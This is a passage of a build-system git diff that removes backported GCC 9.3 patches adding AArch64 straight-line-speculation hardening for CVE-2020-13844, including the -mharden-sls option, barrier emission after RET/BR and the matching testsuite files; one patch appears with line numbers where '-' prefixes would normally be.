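-
- /* If that fails, try using permuting loads. */
-- if (*memory_access_type == VMAT_ELEMENTWISE
-- && (vls_type == VLS_LOAD
-- ? vect_grouped_load_supported (vectype, single_element_p,
-- group_size)
-- : vect_grouped_store_supported (vectype, group_size)))
-+ else if (vls_type == VLS_LOAD
-+ ? vect_grouped_load_supported (vectype, single_element_p,
-+ group_size)
-+ : vect_grouped_store_supported (vectype, group_size))
- {
- *memory_access_type = VMAT_CONTIGUOUS_PERMUTE;
- overrun_p = would_overrun_p;
---
-2.20.1
-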
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch b/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch
deleted file mode 100644
index a7e29f4bd7..0000000000
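--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch
+++ /dev/null
@@ -1,204 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From 20da13e395bde597d8337167c712039c8f923c3b Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:58 +0100
-Subject: [PATCH 1/3] aarch64: New Straight Line Speculation (SLS) mitigation
- flags
-
-Here we introduce the flags that will be used for straight line speculation.
-
-The new flag introduced is `-mharden-sls=`.
-This flag can take arguments of `none`, `all`, or a comma seperated list
-of one or more of `retbr` or `blr`.
-`none` indicates no special mitigation of the straight line speculation
-vulnerability.
-`all` requests all mitigations currently implemented.
-`retbr` requests that the RET and BR instructions have a speculation
-barrier inserted after them.
-`blr` requests that BLR instructions are replaced by a BL to a function
-stub using a BR with a speculation barrier after it.
-
-Setting this on a per-function basis using attributes or the like is not
-enabled, but may be in the future.
-
-(cherry picked from commit a9ba2a9b77bec7eacaf066801f22d1c366a2bc86)
-
-gcc/ChangeLog:
-
-2020-06-02 Matthew Malcomson <matthew.malcomson@arm.com>
-
- * config/aarch64/aarch64-protos.h (aarch64_harden_sls_retbr_p):
- New.
- (aarch64_harden_sls_blr_p): New.
- * config/aarch64/aarch64.c (enum aarch64_sls_hardening_type):
- New.
- (aarch64_harden_sls_retbr_p): New.
- (aarch64_harden_sls_blr_p): New.
- (aarch64_validate_sls_mitigation): New.
- (aarch64_override_options): Parse options for SLS mitigation.
- * config/aarch64/aarch64.opt (-mharden-sls): New option.
- * doc/invoke.texi: Document new option.
----
- gcc/config/aarch64/aarch64-protos.h | 3 ++
- gcc/config/aarch64/aarch64.c | 76 +++++++++++++++++++++++++++++
- gcc/config/aarch64/aarch64.opt | 4 ++
- gcc/doc/invoke.texi | 12 +++++
- 4 files changed, 95 insertions(+)
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index c083cad53..31493f412 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -644,4 +644,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
-
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
-
-+extern bool aarch64_harden_sls_retbr_p (void);
-+extern bool aarch64_harden_sls_blr_p (void);
-+
- #endif /* GCC_AARCH64_PROTOS_H */
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index b452a53af..269ff6c92 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -11734,6 +11734,79 @@ aarch64_validate_mcpu (const char *str, const struct processor **res,
- return false;
- }
-
-+/* Straight line speculation indicators. */
-+enum aarch64_sls_hardening_type
-+{
-+ SLS_NONE = 0,
-+ SLS_RETBR = 1,
-+ SLS_BLR = 2,
-+ SLS_ALL = 3,
-+};
-+static enum aarch64_sls_hardening_type aarch64_sls_hardening;
-+
-+/* Return whether we should mitigatate Straight Line Speculation for the RET
-+ and BR instructions. */
-+bool
-+aarch64_harden_sls_retbr_p (void)
-+{
-+ return aarch64_sls_hardening & SLS_RETBR;
-+}
-+
-+/* Return whether we should mitigatate Straight Line Speculation for the BLR
-+ instruction. */
-+bool
-+aarch64_harden_sls_blr_p (void)
-+{
-+ return aarch64_sls_hardening & SLS_BLR;
-+}
-+
-+/* As of yet we only allow setting these options globally, in the future we may
-+ allow setting them per function. */
-+static void
-+aarch64_validate_sls_mitigation (const char *const_str)
-+{
-+ char *token_save = NULL;
-+ char *str = NULL;
-+
-+ if (strcmp (const_str, "none") == 0)
-+ {
-+ aarch64_sls_hardening = SLS_NONE;
-+ return;
-+ }
-+ if (strcmp (const_str, "all") == 0)
-+ {
-+ aarch64_sls_hardening = SLS_ALL;
-+ return;
-+ }
-+
-+ char *str_root = xstrdup (const_str);
-+ str = strtok_r (str_root, ",", &token_save);
-+ if (!str)
-+ error ("invalid argument given to %<-mharden-sls=%>");
-+
-+ int temp = SLS_NONE;
-+ while (str)
-+ {
-+ if (strcmp (str, "blr") == 0)
-+ temp |= SLS_BLR;
-+ else if (strcmp (str, "retbr") == 0)
-+ temp |= SLS_RETBR;
-+ else if (strcmp (str, "none") == 0 || strcmp (str, "all") == 0)
-+ {
-+ error ("%<%s%> must be by itself for %<-mharden-sls=%>", str);
-+ break;
-+ }
-+ else
-+ {
-+ error ("invalid argument %<%s%> for %<-mharden-sls=%>", str);
-+ break;
-+ }
-+ str = strtok_r (NULL, ",", &token_save);
-+ }
-+ aarch64_sls_hardening = (aarch64_sls_hardening_type) temp;
-+ free (str_root);
-+}
-+
- /* Parses CONST_STR for branch protection features specified in
- aarch64_branch_protect_types, and set any global variables required. Returns
- the parsing result and assigns LAST_STR to the last processed token from
-@@ -11972,6 +12045,9 @@ aarch64_override_options (void)
- selected_arch = NULL;
- selected_tune = NULL;
-
-+ if (aarch64_harden_sls_string)
-+ aarch64_validate_sls_mitigation (aarch64_harden_sls_string);
-+
- if (aarch64_branch_protection_string)
- aarch64_validate_mbranch_protection (aarch64_branch_protection_string);
-
-diff --git a/gcc/config/aarch64/aarch64.opt b/gcc/config/aarch64/aarch64.opt
-index 3c6d1cc90..d27ab6df8 100644
---- a/gcc/config/aarch64/aarch64.opt
-+++ b/gcc/config/aarch64/aarch64.opt
-@@ -71,6 +71,10 @@ mgeneral-regs-only
- Target Report RejectNegative Mask(GENERAL_REGS_ONLY) Save
- Generate code which uses only the general registers.
-
-+mharden-sls=
-+Target RejectNegative Joined Var(aarch64_harden_sls_string)
-+Generate code to mitigate against straight line speculation.
-+
- mfix-cortex-a53-835769
- Target Report Var(aarch64_fix_a53_err835769) Init(2) Save
- Workaround for ARM Cortex-A53 Erratum number 835769.
-diff --git a/gcc/doc/invoke.texi b/gcc/doc/invoke.texi
-index 2f7ffe456..5f04a7d2b 100644
---- a/gcc/doc/invoke.texi
-+++ b/gcc/doc/invoke.texi
-@@ -638,6 +638,7 @@ Objective-C and Objective-C++ Dialects}.
- -mpc-relative-literal-loads @gol
- -msign-return-address=@var{scope} @gol
- -mbranch-protection=@var{none}|@var{standard}|@var{pac-ret}[+@var{leaf}]|@var{bti} @gol
-+-mharden-sls=@var{opts} @gol
- -march=@var{name} -mcpu=@var{name} -mtune=@var{name} @gol
- -moverride=@var{string} -mverbose-cost-dump @gol
- -mstack-protector-guard=@var{guard} -mstack-protector-guard-reg=@var{sysreg} @gol
-@@ -15955,6 +15956,17 @@ argument @samp{leaf} can be used to extend the signing to include leaf
- functions.
- @samp{bti} turns on branch target identification mechanism.
-
-+@item -mharden-sls=@var{opts}
-+@opindex mharden-sls
-+Enable compiler hardening against straight line speculation (SLS).
-+@var{opts} is a comma-separated list of the following options:
-+@table @samp
-+@item retbr
-+@item blr
-+@end table
-+In addition, @samp{-mharden-sls=all} enables all SLS hardening while
-+@samp{-mharden-sls=none} disables all SLS hardening.
-+
- @item -msve-vector-bits=@var{bits}
- @opindex msve-vector-bits
- Specify the number of bits in an SVE vector register. This option only has
---
-2.25.1
-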
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch b/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch
deleted file mode 100644
index c972088d2b..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch
+++ /dev/null
@@ -1,600 +0,0 @@
1CVE: CVE-2020-13844
2Upstream-Status: Backport
3Signed-off-by: Ross Burton <ross.burton@arm.com>
4
5From dc586a749228ecfb71f72ec2ca10e6f7b6874af3 Mon Sep 17 00:00:00 2001
6From: Matthew Malcomson <matthew.malcomson@arm.com>
7Date: Thu, 9 Jul 2020 09:11:59 +0100
8Subject: [PATCH 2/3] aarch64: Introduce SLS mitigation for RET and BR
9 instructions
10
11Instructions following RET or BR are not necessarily executed. In order
12to avoid speculation past RET and BR we can simply append a speculation
13barrier.
14
15Since these speculation barriers will not be architecturally executed,
16they are not expected to add a high performance penalty.
17
18The speculation barrier is to be SB when targeting architectures which
19have this enabled, and DSB SY + ISB otherwise.
20
21We add tests for each of the cases where such an instruction was seen.
22
23This is implemented by modifying each machine description pattern that
24emits either a RET or a BR instruction. We choose not to use something
25like `TARGET_ASM_FUNCTION_EPILOGUE` since it does not affect the
26`indirect_jump`, `jump`, `sibcall_insn` and `sibcall_value_insn`
27patterns and we find it preferable to implement the functionality in the
28same way for every pattern.
29
30There is one particular case which is slightly tricky. The
31implementation of TARGET_ASM_TRAMPOLINE_TEMPLATE uses a BR which needs
32to be mitigated against. The trampoline template is used *once* per
33compilation unit, and the TRAMPOLINE_SIZE is exposed to the user via the
34builtin macro __LIBGCC_TRAMPOLINE_SIZE__.
35In the future we may implement function specific attributes to turn on
36and off hardening on a per-function basis.
37The fixed nature of the trampoline described above implies it will be
38safer to ensure this speculation barrier is always used.
39
40Testing:
41 Bootstrap and regtest done on aarch64-none-linux
42 Used a temporary hack(1) to use these options on every test in the
43 testsuite and a script to check that the output never emitted an
44 unmitigated RET or BR.
45
461) Temporary hack was a change to the testsuite to always use
47`-save-temps` and run a script on the assembly output of those
48compilations which produced one to ensure every RET or BR is immediately
49followed by a speculation barrier.
50
51(cherry picked from be178ecd5ac1fe1510d960ff95c66d0ff831afe1)
52
53gcc/ChangeLog:
54
55 * config/aarch64/aarch64-protos.h (aarch64_sls_barrier): New.
56 * config/aarch64/aarch64.c (aarch64_output_casesi): Emit
57 speculation barrier after BR instruction if needs be.
58 (aarch64_trampoline_init): Handle ptr_mode value & adjust size
59 of code copied.
60 (aarch64_sls_barrier): New.
61 (aarch64_asm_trampoline_template): Add needed barriers.
62 * config/aarch64/aarch64.h (AARCH64_ISA_SB): New.
63 (TARGET_SB): New.
64 (TRAMPOLINE_SIZE): Account for barrier.
65 * config/aarch64/aarch64.md (indirect_jump, *casesi_dispatch,
66 simple_return, *do_return, *sibcall_insn, *sibcall_value_insn):
67 Emit barrier if needs be, also account for possible barrier using
68 "sls_length" attribute.
69 (sls_length): New attribute.
70 (length): Determine default using any non-default sls_length
71 value.
72
73gcc/testsuite/ChangeLog:
74
75 * gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c: New test.
76 * gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c:
77 New test.
78 * gcc.target/aarch64/sls-mitigation/sls-mitigation.exp: New file.
79 * lib/target-supports.exp (check_effective_target_aarch64_asm_sb_ok):
80 New proc.
81---
82 gcc/config/aarch64/aarch64-protos.h | 1 +
83 gcc/config/aarch64/aarch64.c | 41 +++++-
84 gcc/config/aarch64/aarch64.h | 10 +-
85 gcc/config/aarch64/aarch64.md | 75 ++++++++---
86 .../sls-mitigation/sls-miti-retbr-pacret.c | 15 +++
87 .../aarch64/sls-mitigation/sls-miti-retbr.c | 119 ++++++++++++++++++
88 .../aarch64/sls-mitigation/sls-mitigation.exp | 73 +++++++++++
89 gcc/testsuite/lib/target-supports.exp | 3 +-
90 8 files changed, 312 insertions(+), 25 deletions(-)
91 create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
92 create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
93 create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
94
95diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
96index 31493f412..885eae893 100644
97--- a/gcc/config/aarch64/aarch64-protos.h
98+++ b/gcc/config/aarch64/aarch64-protos.h
99@@ -644,6 +644,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
100
101 bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
102
103+const char *aarch64_sls_barrier (int);
104 extern bool aarch64_harden_sls_retbr_p (void);
105 extern bool aarch64_harden_sls_blr_p (void);
106
107diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
108index 269ff6c92..dff61105c 100644
109--- a/gcc/config/aarch64/aarch64.c
110+++ b/gcc/config/aarch64/aarch64.c
111@@ -8412,8 +8412,8 @@ aarch64_return_addr (int count, rtx frame ATTRIBUTE_UNUSED)
112 static void
113 aarch64_asm_trampoline_template (FILE *f)
114 {
115- int offset1 = 16;
116- int offset2 = 20;
117+ int offset1 = 24;
118+ int offset2 = 28;
119
120 if (aarch64_bti_enabled ())
121 {
122@@ -8436,6 +8436,17 @@ aarch64_asm_trampoline_template (FILE *f)
123 }
124 asm_fprintf (f, "\tbr\t%s\n", reg_names [IP1_REGNUM]);
125
126+ /* We always emit a speculation barrier.
127+ This is because the same trampoline template is used for every nested
128+ function. Since nested functions are not particularly common or
129+ performant we don't worry too much about the extra instructions to copy
130+ around.
131+ This is not yet a problem, since we have not yet implemented function
132+ specific attributes to choose between hardening against straight line
133+ speculation or not, but such function specific attributes are likely to
134+ happen in the future. */
135+ asm_fprintf (f, "\tdsb\tsy\n\tisb\n");
136+
137 /* The trampoline needs an extra padding instruction. In case if BTI is
138 enabled the padding instruction is replaced by the BTI instruction at
139 the beginning. */
140@@ -8450,10 +8461,14 @@ static void
141 aarch64_trampoline_init (rtx m_tramp, tree fndecl, rtx chain_value)
142 {
143 rtx fnaddr, mem, a_tramp;
144- const int tramp_code_sz = 16;
145+ const int tramp_code_sz = 24;
146
147 /* Don't need to copy the trailing D-words, we fill those in below. */
148- emit_block_move (m_tramp, assemble_trampoline_template (),
149+ /* We create our own memory address in Pmode so that `emit_block_move` can
150+ use parts of the backend which expect Pmode addresses. */
151+ rtx temp = convert_memory_address (Pmode, XEXP (m_tramp, 0));
152+ emit_block_move (gen_rtx_MEM (BLKmode, temp),
153+ assemble_trampoline_template (),
154 GEN_INT (tramp_code_sz), BLOCK_OP_NORMAL);
155 mem = adjust_address (m_tramp, ptr_mode, tramp_code_sz);
156 fnaddr = XEXP (DECL_RTL (fndecl), 0);
157@@ -8640,6 +8655,8 @@ aarch64_output_casesi (rtx *operands)
158 output_asm_insn (buf, operands);
159 output_asm_insn (patterns[index][1], operands);
160 output_asm_insn ("br\t%3", operands);
161+ output_asm_insn (aarch64_sls_barrier (aarch64_harden_sls_retbr_p ()),
162+ operands);
163 assemble_label (asm_out_file, label);
164 return "";
165 }
166@@ -18976,6 +18993,22 @@ aarch64_file_end_indicate_exec_stack ()
167 #undef GNU_PROPERTY_AARCH64_FEATURE_1_BTI
168 #undef GNU_PROPERTY_AARCH64_FEATURE_1_AND
169
170+/* Helper function for straight line speculation.
171+ Return what barrier should be emitted for straight line speculation
172+ mitigation.
173+ When not mitigating against straight line speculation this function returns
174+ an empty string.
175+ When mitigating against straight line speculation, use:
176+ * SB when the v8.5-A SB extension is enabled.
177+ * DSB+ISB otherwise. */
178+const char *
179+aarch64_sls_barrier (int mitigation_required)
180+{
181+ return mitigation_required
182+ ? (TARGET_SB ? "sb" : "dsb\tsy\n\tisb")
183+ : "";
184+}
185+
186 /* Target-specific selftests. */
187
188 #if CHECKING_P
189diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
190index 772a97296..72ddc6fd9 100644
191--- a/gcc/config/aarch64/aarch64.h
192+++ b/gcc/config/aarch64/aarch64.h
193@@ -235,6 +235,7 @@ extern unsigned aarch64_architecture_version;
194 #define AARCH64_ISA_F16FML (aarch64_isa_flags & AARCH64_FL_F16FML)
195 #define AARCH64_ISA_RCPC8_4 (aarch64_isa_flags & AARCH64_FL_RCPC8_4)
196 #define AARCH64_ISA_V8_5 (aarch64_isa_flags & AARCH64_FL_V8_5)
197+#define AARCH64_ISA_SB (aarch64_isa_flags & AARCH64_FL_SB)
198
199 /* Crypto is an optional extension to AdvSIMD. */
200 #define TARGET_CRYPTO (TARGET_SIMD && AARCH64_ISA_CRYPTO)
201@@ -285,6 +286,9 @@ extern unsigned aarch64_architecture_version;
202 #define TARGET_FIX_ERR_A53_835769_DEFAULT 1
203 #endif
204
205+/* SB instruction is enabled through +sb. */
206+#define TARGET_SB (AARCH64_ISA_SB)
207+
208 /* Apply the workaround for Cortex-A53 erratum 835769. */
209 #define TARGET_FIX_ERR_A53_835769 \
210 ((aarch64_fix_a53_err835769 == 2) \
211@@ -931,8 +935,10 @@ typedef struct
212
213 #define RETURN_ADDR_RTX aarch64_return_addr
214
215-/* BTI c + 3 insns + 2 pointer-sized entries. */
216-#define TRAMPOLINE_SIZE (TARGET_ILP32 ? 24 : 32)
217+/* BTI c + 3 insns
218+ + sls barrier of DSB + ISB.
219+ + 2 pointer-sized entries. */
220+#define TRAMPOLINE_SIZE (24 + (TARGET_ILP32 ? 8 : 16))
221
222 /* Trampolines contain dwords, so must be dword aligned. */
223 #define TRAMPOLINE_ALIGNMENT 64
224diff --git a/gcc/config/aarch64/aarch64.md b/gcc/config/aarch64/aarch64.md
225index cc5a887d4..494aee964 100644
226--- a/gcc/config/aarch64/aarch64.md
227+++ b/gcc/config/aarch64/aarch64.md
228@@ -331,10 +331,25 @@
229 ;; Attribute that specifies whether the alternative uses MOVPRFX.
230 (define_attr "movprfx" "no,yes" (const_string "no"))
231
232+;; Attribute to specify that an alternative has the length of a single
233+;; instruction plus a speculation barrier.
234+(define_attr "sls_length" "none,retbr,casesi" (const_string "none"))
235+
236 (define_attr "length" ""
237 (cond [(eq_attr "movprfx" "yes")
238 (const_int 8)
239- ] (const_int 4)))
240+
241+ (eq_attr "sls_length" "retbr")
242+ (cond [(match_test "!aarch64_harden_sls_retbr_p ()") (const_int 4)
243+ (match_test "TARGET_SB") (const_int 8)]
244+ (const_int 12))
245+
246+ (eq_attr "sls_length" "casesi")
247+ (cond [(match_test "!aarch64_harden_sls_retbr_p ()") (const_int 16)
248+ (match_test "TARGET_SB") (const_int 20)]
249+ (const_int 24))
250+ ]
251+ (const_int 4)))
252
253 ;; Strictly for compatibility with AArch32 in pipeline models, since AArch64 has
254 ;; no predicated insns.
255@@ -370,8 +385,12 @@
256 (define_insn "indirect_jump"
257 [(set (pc) (match_operand:DI 0 "register_operand" "r"))]
258 ""
259- "br\\t%0"
260- [(set_attr "type" "branch")]
261+ {
262+ output_asm_insn ("br\\t%0", operands);
263+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
264+ }
265+ [(set_attr "type" "branch")
266+ (set_attr "sls_length" "retbr")]
267 )
268
269 (define_insn "jump"
270@@ -657,7 +676,7 @@
271 "*
272 return aarch64_output_casesi (operands);
273 "
274- [(set_attr "length" "16")
275+ [(set_attr "sls_length" "casesi")
276 (set_attr "type" "branch")]
277 )
278
279@@ -736,14 +755,18 @@
280 [(return)]
281 ""
282 {
283+ const char *ret = NULL;
284 if (aarch64_return_address_signing_enabled ()
285 && TARGET_ARMV8_3
286 && !crtl->calls_eh_return)
287- return "retaa";
288-
289- return "ret";
290+ ret = "retaa";
291+ else
292+ ret = "ret";
293+ output_asm_insn (ret, operands);
294+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
295 }
296- [(set_attr "type" "branch")]
297+ [(set_attr "type" "branch")
298+ (set_attr "sls_length" "retbr")]
299 )
300
301 (define_expand "return"
302@@ -755,8 +778,12 @@
303 (define_insn "simple_return"
304 [(simple_return)]
305 "aarch64_use_simple_return_insn_p ()"
306- "ret"
307- [(set_attr "type" "branch")]
308+ {
309+ output_asm_insn ("ret", operands);
310+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
311+ }
312+ [(set_attr "type" "branch")
313+ (set_attr "sls_length" "retbr")]
314 )
315
316 (define_insn "*cb<optab><mode>1"
317@@ -947,10 +974,16 @@
318 (match_operand 1 "" ""))
319 (return)]
320 "SIBLING_CALL_P (insn)"
321- "@
322- br\\t%0
323- b\\t%c0"
324- [(set_attr "type" "branch, branch")]
325+ {
326+ if (which_alternative == 0)
327+ {
328+ output_asm_insn ("br\\t%0", operands);
329+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
330+ }
331+ return "b\\t%c0";
332+ }
333+ [(set_attr "type" "branch, branch")
334+ (set_attr "sls_length" "retbr,none")]
335 )
336
337 (define_insn "*sibcall_value_insn"
338@@ -960,10 +993,16 @@
339 (match_operand 2 "" "")))
340 (return)]
341 "SIBLING_CALL_P (insn)"
342- "@
343- br\\t%1
344- b\\t%c1"
345- [(set_attr "type" "branch, branch")]
346+ {
347+ if (which_alternative == 0)
348+ {
349+ output_asm_insn ("br\\t%1", operands);
350+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
351+ }
352+ return "b\\t%c1";
353+ }
354+ [(set_attr "type" "branch, branch")
355+ (set_attr "sls_length" "retbr,none")]
356 )
357
358 ;; Call subroutine returning any type.
359diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
360new file mode 100644
361index 000000000..7656123ee
362--- /dev/null
363+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
364@@ -0,0 +1,15 @@
365+/* Avoid ILP32 since pacret is only available for LP64 */
366+/* { dg-do compile { target { ! ilp32 } } } */
367+/* { dg-additional-options "-mharden-sls=retbr -mbranch-protection=pac-ret -march=armv8.3-a" } */
368+
369+/* Testing the do_return pattern for retaa. */
370+long retbr_subcall(void);
371+long retbr_do_return_retaa(void)
372+{
373+ return retbr_subcall()+1;
374+}
375+
376+/* Ensure there are no BR or RET instructions which are not directly followed
377+ by a speculation barrier. */
378+/* { dg-final { scan-assembler-not {\t(br|ret|retaa)\tx[0-9][0-9]?\n\t(?!dsb\tsy\n\tisb)} } } */
379+/* { dg-final { scan-assembler-not {ret\t} } } */
380diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
381new file mode 100644
382index 000000000..573b30cdc
383--- /dev/null
384+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
385@@ -0,0 +1,119 @@
386+/* We ensure that -Wpedantic is off since it complains about the trampolines
387+ we explicitly want to test. */
388+/* { dg-additional-options "-mharden-sls=retbr -Wno-pedantic " } */
389+/*
390+ Ensure that the SLS hardening of RET and BR leaves no unprotected RET/BR
391+ instructions.
392+ */
393+typedef int (foo) (int, int);
394+typedef void (bar) (int, int);
395+struct sls_testclass {
396+ foo *x;
397+ bar *y;
398+ int left;
399+ int right;
400+};
401+
402+int
403+retbr_sibcall_value_insn (struct sls_testclass x)
404+{
405+ return x.x(x.left, x.right);
406+}
407+
408+void
409+retbr_sibcall_insn (struct sls_testclass x)
410+{
411+ x.y(x.left, x.right);
412+}
413+
414+/* Aim to test two different returns.
415+ One that introduces a tail call in the middle of the function, and one that
416+ has a normal return. */
417+int
418+retbr_multiple_returns (struct sls_testclass x)
419+{
420+ int temp;
421+ if (x.left % 10)
422+ return x.x(x.left, 100);
423+ else if (x.right % 20)
424+ {
425+ return x.x(x.left * x.right, 100);
426+ }
427+ temp = x.left % x.right;
428+ temp *= 100;
429+ temp /= 2;
430+ return temp % 3;
431+}
432+
433+void
434+retbr_multiple_returns_void (struct sls_testclass x)
435+{
436+ if (x.left % 10)
437+ {
438+ x.y(x.left, 100);
439+ }
440+ else if (x.right % 20)
441+ {
442+ x.y(x.left * x.right, 100);
443+ }
444+ return;
445+}
446+
447+/* Testing the casesi jump via register. */
448+__attribute__ ((optimize ("Os")))
449+int
450+retbr_casesi_dispatch (struct sls_testclass x)
451+{
452+ switch (x.left)
453+ {
454+ case -5:
455+ return -2;
456+ case -3:
457+ return -1;
458+ case 0:
459+ return 0;
460+ case 3:
461+ return 1;
462+ case 5:
463+ break;
464+ default:
465+ __builtin_unreachable ();
466+ }
467+ return x.right;
468+}
469+
470+/* Testing the BR in trampolines is mitigated against. */
471+void f1 (void *);
472+void f3 (void *, void (*)(void *));
473+void f2 (void *);
474+
475+int
476+retbr_trampolines (void *a, int b)
477+{
478+ if (!b)
479+ {
480+ f1 (a);
481+ return 1;
482+ }
483+ if (b)
484+ {
485+ void retbr_tramp_internal (void *c)
486+ {
487+ if (c == a)
488+ f2 (c);
489+ }
490+ f3 (a, retbr_tramp_internal);
491+ }
492+ return 0;
493+}
494+
495+/* Testing the indirect_jump pattern. */
496+void
497+retbr_indirect_jump (int *buf)
498+{
499+ __builtin_longjmp(buf, 1);
500+}
501+
502+/* Ensure there are no BR or RET instructions which are not directly followed
503+ by a speculation barrier. */
504+/* { dg-final { scan-assembler-not {\t(br|ret|retaa)\tx[0-9][0-9]?\n\t(?!dsb\tsy\n\tisb|sb)} } } */
505diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
506new file mode 100644
507index 000000000..812250379
508--- /dev/null
509+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
510@@ -0,0 +1,73 @@
511+# Regression driver for SLS mitigation on AArch64.
512+# Copyright (C) 2020 Free Software Foundation, Inc.
513+# Contributed by ARM Ltd.
514+#
515+# This file is part of GCC.
516+#
517+# GCC is free software; you can redistribute it and/or modify it
518+# under the terms of the GNU General Public License as published by
519+# the Free Software Foundation; either version 3, or (at your option)
520+# any later version.
521+#
522+# GCC is distributed in the hope that it will be useful, but
523+# WITHOUT ANY WARRANTY; without even the implied warranty of
524+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
525+# General Public License for more details.
526+#
527+# You should have received a copy of the GNU General Public License
528+# along with GCC; see the file COPYING3. If not see
529+# <http://www.gnu.org/licenses/>. */
530+
531+# Exit immediately if this isn't an AArch64 target.
532+if {![istarget aarch64*-*-*] } then {
533+ return
534+}
535+
536+# Load support procs.
537+load_lib gcc-dg.exp
538+load_lib torture-options.exp
539+
540+# If a testcase doesn't have special options, use these.
541+global DEFAULT_CFLAGS
542+if ![info exists DEFAULT_CFLAGS] then {
543+ set DEFAULT_CFLAGS " "
544+}
545+
546+# Initialize `dg'.
547+dg-init
548+torture-init
549+
550+# Use different architectures as well as the normal optimisation options.
551+# (i.e. use both SB and DSB+ISB barriers).
552+
553+set save-dg-do-what-default ${dg-do-what-default}
554+# Main loop.
555+# Run with torture tests (i.e. a bunch of different optimisation levels) just
556+# to increase test coverage.
557+set dg-do-what-default assemble
558+gcc-dg-runtest [lsort [glob -nocomplain $srcdir/$subdir/*.\[cCS\]]] \
559+ "-save-temps" $DEFAULT_CFLAGS
560+
561+# Run the same tests but this time with SB extension.
562+# Since not all supported assemblers will support that extension we decide
563+# whether to assemble or just compile based on whether the extension is
564+# supported for the available assembler.
565+
566+set templist {}
567+foreach x $DG_TORTURE_OPTIONS {
568+ lappend templist "$x -march=armv8.3-a+sb "
569+ lappend templist "$x -march=armv8-a+sb "
570+}
571+set-torture-options $templist
572+if { [check_effective_target_aarch64_asm_sb_ok] } {
573+ set dg-do-what-default assemble
574+} else {
575+ set dg-do-what-default compile
576+}
577+gcc-dg-runtest [lsort [glob -nocomplain $srcdir/$subdir/*.\[cCS\]]] \
578+ "-save-temps" $DEFAULT_CFLAGS
579+set dg-do-what-default ${save-dg-do-what-default}
580+
581+# All done.
582+torture-finish
583+dg-finish
584diff --git a/gcc/testsuite/lib/target-supports.exp b/gcc/testsuite/lib/target-supports.exp
585index ea9a50ccb..79482f9b6 100644
586--- a/gcc/testsuite/lib/target-supports.exp
587+++ b/gcc/testsuite/lib/target-supports.exp
588@@ -8579,7 +8579,8 @@ proc check_effective_target_aarch64_tiny { } {
589 # Create functions to check that the AArch64 assembler supports the
590 # various architecture extensions via the .arch_extension pseudo-op.
591
592-foreach { aarch64_ext } { "fp" "simd" "crypto" "crc" "lse" "dotprod" "sve"} {
593+foreach { aarch64_ext } { "fp" "simd" "crypto" "crc" "lse" "dotprod" "sve"
594+ "sb"} {
595 eval [string map [list FUNC $aarch64_ext] {
596 proc check_effective_target_aarch64_asm_FUNC_ok { } {
597 if { [istarget aarch64*-*-*] } {
598--
5992.25.1
600
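--- a/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch
+++ /dev/null
@@ -1,659 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From 2155170525f93093b90a1a065e7ed71a925566e9 Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:59 +0100
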